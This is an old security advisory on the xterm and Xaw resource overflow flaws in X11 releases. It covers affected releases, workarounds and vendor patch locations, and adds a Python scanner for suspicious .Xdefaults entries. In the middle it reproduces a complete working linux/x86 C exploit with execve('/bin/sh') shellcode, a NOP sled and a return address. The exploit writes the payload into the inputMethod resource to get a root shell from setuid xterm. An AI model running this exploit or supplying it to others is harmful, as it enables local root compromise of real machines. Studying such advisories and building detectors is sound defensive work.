COMMAND
xterm and Xaw
SYSTEMS AFFECTED
Systems running xterm/Xaw (see below for details)
PROBLEM
The following information is based on The Open Group advisory.
Vulnerabilities exist in the terminal emulator xterm(1) and in the
Xaw library distributed in various MIT X Consortium; X Consortium,
Inc.; and The Open Group X Project Team releases. These
vulnerabilities may be exploited by an intruder to gain root access.
The resources and the releases affected by the xterm vulnerability
are:
Release    inputMethod  preeditType  *Keymap
X11R3      NO           NO           YES
X11R4      NO           NO           YES
X11R5      NO           NO           YES
X11R6      NO           NO           YES
X11R6.1    YES          YES          YES
X11R6.2    YES          YES          YES
X11R6.3    YES          YES          YES
X11R6.4    YES          YES          YES
The resources and the releases affected by the Xaw library
vulnerability are:
Release    inputMethod  preeditType
X11R6      YES          YES
X11R6.1    YES          YES
X11R6.2    YES          YES
X11R6.3    YES          YES
X11R6.4    YES          YES
Note: X11R6.2 was not released to the public.
By crafting an arbitrarily long string that contains embedded
machine code and using it to set specific "resources", a user may
obtain a shell prompt that has root privileges. Anyone using the
MIT X Consortium; X Consortium, Inc.; or X Project Team xterm who
has xterm installed setuid-root may be vulnerable. Anyone using an
xterm based on any of the sources listed above may also be
vulnerable to the xterm vulnerability. In order to be vulnerable to
the Xaw library vulnerability, the Xaw Text widget must be used by
a setuid-root program. Anyone using an Xaw replacement based on any
of the released versions of Xaw listed above (e.g. Xaw3d) may also
be vulnerable to the Xaw vulnerability. The same applies to XFree86
(which is not a member of The Open Group). The Linux exploit below
was written by 'alcuin' (taken from rootshell). For XFree86 patches
see the XFree86 advisory and the 'Solution' section.
/*
 * xterm_exp.c : linux/x86 xterm.Xaw exploit
 * by alcuin
 * 5/4/98
 * It works against both Xaw and neXtaw widgets
 * NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
 * use xterm again.
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>

/* Return the current stack pointer (32-bit x86 only). */
unsigned int getsp(void) {
    unsigned int sp;
    __asm__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

/* Container for the shellcode: its bytes are copied out of the function
   body with strcpy() below, so it is never called directly. */
void rootshell(void) {
    __asm__(
        "movb $0x56, %al\n\t"
        "l1:cmpb $0x12, %al\n\t"
        "je l2\n\t"
        "movb $0x12,%al\n\t"
        "call l1\n\t"
        "l2:pop %esi\n\t"
        "xorl %eax,%eax\n\t"
        "movb $0x25, %al\n\t"
        "addl %eax,%esi\n\t"
        "movl %esi,%ebx\n\t"
        "movl %esi,%edi\n\t"
        "movb $8,%al\n\t"
        "addl %eax,%edi\n\t"
        "movb $5,%al\n\t"
        "addl %eax,%esi\n\t"
        "movl %esi,(%edi)\n\t"
        "movl %edi,%ecx\n\t"
        "incl %edi\n\t"
        "incl %edi\n\t"
        "incl %edi\n\t"
        "incl %edi\n\t"
        "xorb %al,%al\n\t"
        "movl %eax,(%edi)\n\t"
        "movl %edi,%edx\n\t"
        "movb $0xb,%al\n\t"
        "int $0x80\n\t"
        ".string \"/bin/sh\"\n"
    );
}

#define CONFFILE ".Xdefaults"
#define OLDFILE  ".Xdefaults.old"
#define NEWFILE  ".Xdefaults.new"

int main(int argc, char **argv) {
    char *home;
    FILE *f_in, *f_out;
    char buf[16384];
    char shellbuf[16384];
    char *s;
    unsigned int sp = getsp();

    (void)argc;
    (void)argv;

    if ((home = getenv("HOME")) != NULL)
        chdir(home);
    if (!(f_out = fopen(NEWFILE, "w"))) {
        perror("fopen");
        exit(1);
    }

    /* Copy the existing .Xdefaults into the new file, dropping any
       xterm*inputMethod line so the one written below is the only one. */
    if ((f_in = fopen(CONFFILE, "r")) != NULL) {
        while (fgets(buf, sizeof(buf), f_in) != NULL) {
            for (s = buf; isblank((unsigned char)*s); s++)
                ;
            if (strncmp(s, "xterm*inputMethod", 17) != 0)
                fputs(buf, f_out);
        }
        fclose(f_in);
    }

    /* fill the buffer with nops */
    memset(shellbuf, 0x90, sizeof(shellbuf));
    shellbuf[sizeof(shellbuf) - 1] = 0;
    /* write the return address */
    s = shellbuf + 2052;
    *(int *)s = sp + 0x69F5;
    /* write the root shell code */
    s = shellbuf + 2800;
    strcpy(s, (char *)rootshell);

    fputs("xterm*inputMethod:", f_out);
    fputs(shellbuf, f_out);
    fclose(f_out);

    system("/bin/cp " CONFFILE " " OLDFILE);
    system("/bin/mv -f " NEWFILE " " CONFFILE);
    execl("/usr/X11R6/bin/xterm", "xterm", (char *)NULL);
    return 0;
}
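A defender-side check, added here and not part of the advisory or of alcuin's code: it scans an X resource file for the artifact this class of exploit leaves behind, namely an inputMethod, preeditType or Keymap value far longer than any legitimate setting, or any value containing non-printable bytes or a run of 0x90 NOPs. The length threshold, the parser's handling of comments and continuations, and the sample file contents are assumptions (the sample is constructed).

```python
import re

# Resources the advisory names as the overflow vectors for setuid xterm/Xaw.
VULNERABLE_RESOURCES = {"inputMethod", "preeditType", "Keymap"}
MAX_SANE_LEN = 256       # assumption: no legitimate value for these is this long
NOP_SLED = "\x90" * 16   # run of x86 NOPs, the filler the exploit above writes


def parse_xresources(text):
    """Yield (name, value) pairs; skips '!' comments and cpp '#' directives,
    joins backslash-newline continuations and splits on the first ':'."""
    for line in text.replace("\\\n", "").splitlines():
        line = line.strip()
        if not line or line[0] in "!#":
            continue
        name, sep, value = line.partition(":")
        if sep:
            yield name.strip(), value.strip()


def suspicious_entries(text, max_len=MAX_SANE_LEN):
    """Return [(resource_name, [reasons])] for entries shaped like an overflow payload."""
    findings = []
    for name, value in parse_xresources(text):
        leaf = re.split(r"[.*]", name)[-1]   # 'xterm*inputMethod' -> 'inputMethod'
        reasons = []
        if leaf in VULNERABLE_RESOURCES and len(value) > max_len:
            reasons.append(f"{leaf} value is {len(value)} bytes (> {max_len})")
        nonprint = sum(1 for c in value if c != "\t" and not 0x20 <= ord(c) < 0x7F)
        if nonprint:
            reasons.append(f"{nonprint} non-printable bytes in value")
        if NOP_SLED in value:
            reasons.append("run of 0x90 bytes (NOP sled)")
        if reasons:
            findings.append((name, reasons))
    return findings


def scan_file(path):
    # latin-1 maps each byte to one code point, so binary payload bytes survive
    with open(path, encoding="latin-1") as fh:
        return suspicious_entries(fh.read())


# Constructed sample: benign entries plus one line shaped like the exploit's output
# (NOP filler followed by a few arbitrary non-ASCII bytes standing in for a payload).
SAMPLE_XDEFAULTS = (
    "XTerm*font: fixed\n"
    "! user comment\n"
    "xterm*inputMethod: XIM\n"
    "xterm*inputMethod:" + "\x90" * 3000 + "\xde\xad\xbe\xef/bin/sh\n"
)
```

Run `scan_file` over each user's ~/.Xdefaults (and any file loaded via xrdb) on a host that still ships a setuid xterm; a hit on a vulnerable resource is worth treating as an attempted local privilege escalation.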
SOLUTION
This issue will be corrected in future X Project Team releases of
X11. As a temporary workaround, remove the setuid-root bit from the
xterm binary:
# chmod 0755 <path-to-xterm>/xterm
For the Xaw vulnerability, remove the setuid-root bit from any
program that uses the Xaw Text widget:
# chmod 0755 <setuid-root-program>
Patches to address this vulnerability have been given to X Project
Team members:
Astec
Attachmate
BARCO Chromatics
CliniComp International
Digital
Hewlett-Packard
Hitachi
Hummingbird Communications
IBM
Jupiter Systems
Metro Link
Network Computing Devices
NetManage
Peritek
Seaweed Systems
Sequent Computer Systems
Shiman Associates
Silicon Graphics
Societe Axel
Siemens Nixdorf
Starnet
SunSoft
WRQ
Xi Graphics
The patches, when they become available, may be found on
ftp://ftp.x.org/pub/R6.4/fixes/
All releases of XFree86 from 3.0 to 3.3.2 (inclusive) are
vulnerable. XFree86 is independently releasing its own fixes for
these problems. A source patch is available at:
ftp://ftp.xfree86.org/pub/XFree86/3.3.2/fixes/3.3.2-patch1
Updated binaries for some OSs are also available now, and others
will be available soon. The updated binaries can be found in the
X3321upd.tgz files in the appropriate subdirectories of the
XFree86 3.3.2 binaries directory:
ftp://ftp.xfree86.org/pub/XFree86/3.3.2/binaries
Be sure to read:
http://www.xfree86.org/3.3.2/RELNOTES.html
A patch is available for the NetBSD 1.3 and NetBSD 1.3.1 X11
source, which fixes the above problems. You may find this patch
on the NetBSD ftp server:
ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19980503-xsrc
Patches for Xaw vulnerability for IRIX:
OS Version   Patch #   Other Actions
----------   -------   -------------
IRIX 5.0.x             Upgrade or disable
IRIX 5.1.x             Upgrade or disable
IRIX 5.2               Upgrade or disable
IRIX 5.3     3162
IRIX 6.0.x             Upgrade or disable
IRIX 6.1               Upgrade or disable
IRIX 6.2     3163
IRIX 6.3     3164
IRIX 6.4     3165
IRIX 6.5     6.5.1     Note
NOTE: If you have not received an IRIX 6.5.1m CD for IRIX 6.5,
contact your SGI Support Provider or download the IRIX 6.5.1
Maintenance Release Stream from http://support.sgi.com/
Patches for xterm vulnerability for IRIX:
OS Version   Patch #   Other Actions
----------   -------   -------------
IRIX 3.x               Upgrade or disable
IRIX 4.x               Upgrade or disable
IRIX 5.0.x             Upgrade or disable
IRIX 5.1.x             Upgrade or disable
IRIX 5.2               Upgrade or disable
IRIX 5.3     3142
IRIX 6.0.x             Upgrade or disable
IRIX 6.1               Upgrade or disable
IRIX 6.2     3143
IRIX 6.3     3144
IRIX 6.4     3151
IRIX 6.5     6.5.1     Note
NOTE: If you have not received an IRIX 6.5.1m CD for IRIX 6.5,
contact your SGI Support Provider or download the IRIX 6.5.1
Maintenance Release Stream from http://support.sgi.com/
The patches contain details on how to apply them.